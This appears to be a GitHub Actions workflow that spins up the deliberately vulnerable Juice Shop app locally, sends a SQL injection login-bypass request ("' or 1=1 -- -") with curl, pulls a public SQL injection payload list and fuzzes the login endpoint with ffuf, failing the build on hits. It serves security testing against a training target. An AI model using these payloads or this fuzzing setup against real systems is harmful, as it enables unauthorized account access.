name: Fuzzing

on:
  push:
    branches: [ main ]

permissions:
  contents: write
  pull-requests: write
  security-events: write
  actions: read

jobs:
  ffuf:
    runs-on: ubuntu-latest
    services:
        juice:
          image: bkimminich/juice-shop
          ports:
            - 3000:3000
    steps:
      - name: Wait for service
        run: |
            sleep 10 
            curl --path-as-is -i -s -k -X $'POST' \
              -H $'Host: localhost:3000' -H $'Content-Length: 43' -H $'Content-Type: application/json' -H $'Connection: keep-alive' \
              --data-binary $'{\"email\":\"\' or 1=1 -- -\",\"password\":\"pass\"}' \
              $'http://localhost:3000/rest/user/login'

      - name: Get payloads
        run: |
          wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/SQL-Injection
      
      - name: Install fuzzing
        run: |
          go install github.com/ffuf/ffuf/v2@latest

      - name: Run FFUF directly
        run: |
          $HOME/go/bin/ffuf -u http://localhost:3000/rest/user/login -X POST -H "Content-Type: application/json" -d '{"email":"FUZZ","password":"anothervalue"}' -w SQL-Injection -mc 200 -mr "authentication" -t 10 -o ffuf-result.json -of json -debug-log ffuf-debug.log

      - name: Show Results
        run: |
          if [ -f ffuf-result.json ]; then
            HITS=$(grep -o '"input"' ffuf-result.json | wc -l)
            echo "Found $HITS hits"
            if [ "$HITS" -gt 0 ]; then
              echo "SQL Injection vector detected!"
              cat ffuf-result.json
              exit 1
            else
              echo "No SQLi vectors detected."
            fi
          else
            echo "No results file found"
          fi

      - name: Save Container Logs
        if: always()
        run: |
          docker logs $(docker ps -q) > juice-logs.log || true

      - name: Upload Artifacts
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: security-reports-bundle
          path: |
            ffuf-result.json
            ffuf-debug.log
            juice-logs.log
            sqli-payloads.txt
